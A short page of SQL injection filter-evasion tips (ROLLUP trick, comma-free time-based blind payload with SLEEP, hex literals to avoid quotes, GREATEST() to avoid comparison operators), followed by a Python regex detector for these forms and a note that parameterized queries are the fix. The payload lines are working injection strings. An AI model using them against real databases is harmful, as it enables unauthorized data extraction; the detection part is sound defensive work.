SQL injection tips

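1. group by pwd with rollup limit 1 offset 2 #
2. If you need to bypass commas: ' union select case when substring((select xx from xx where xx) from 1 for 1)='x' then sleep(5) else 0 end #
3. Bypassing quotes: use hexadecimal, e.g. "user"=0x75736572
4. Bypassing greater-than/less-than: the greatest(n1,n2,n3,...) function returns the largest of its arguments (n1,n2,n3,...), e.g. greatest(ascii(substr(database(),1,1)),64)=64, which is true only when the ASCII value is at most 64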
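
For defenders, the four forms listed above can be matched directly in request parameters or query logs. The following is an added example, not code from the original page; the rule names are assumptions of the example and the sample inputs are constructed from the list above.

```python
import re

# Signatures for the four filter-evasion forms in the list above.
# Rule names are hypothetical labels chosen for this added example.
RULES = {
    "group_by_with_rollup": re.compile(r"\bgroup\s+by\b.+\bwith\s+rollup\b", re.I | re.S),
    "comma_free_substring": re.compile(
        r"\b(?:substring|substr|mid)\s*\(.+?\bfrom\s+\d+\s+for\s+\d+\s*\)", re.I | re.S),
    "time_based_branch": re.compile(r"\bcase\s+when\b.+\b(?:sleep|benchmark)\s*\(", re.I | re.S),
    "greatest_least_compare": re.compile(r"\b(?:greatest|least)\s*\(.+\)\s*=", re.I | re.S),
}
# MySQL-style hex literal made of whole bytes, e.g. 0x75736572
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(value):
    """Return the printable ASCII strings hidden in 0x... literals."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        raw = bytes.fromhex(match.group(1))
        if all(0x20 <= b < 0x7F for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def inspect(value):
    """Return (names of matching rules, strings decoded from hex literals)."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(value))
    hidden = decode_hex_literals(value)
    if hidden:
        hits.append("hex_string_literal")
    return hits, hidden


# Constructed sample parameter values: the four forms above plus one benign input.
SAMPLES = [
    "group by pwd with rollup limit 1 offset 2 #",
    "' union select case when substring((select xx from xx where xx) from 1 for 1)='x' then sleep(5) else 0 end #",
    '"user"=0x75736572',
    "greatest(ascii(substr(database(),1,1)),64)=64",
    "plain search text, with a comma",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample), "<-", sample)
```

A blocklist on commas, quotes or < > passes the first four inputs, so signatures like these serve detection only; parameterized queries remain the fix.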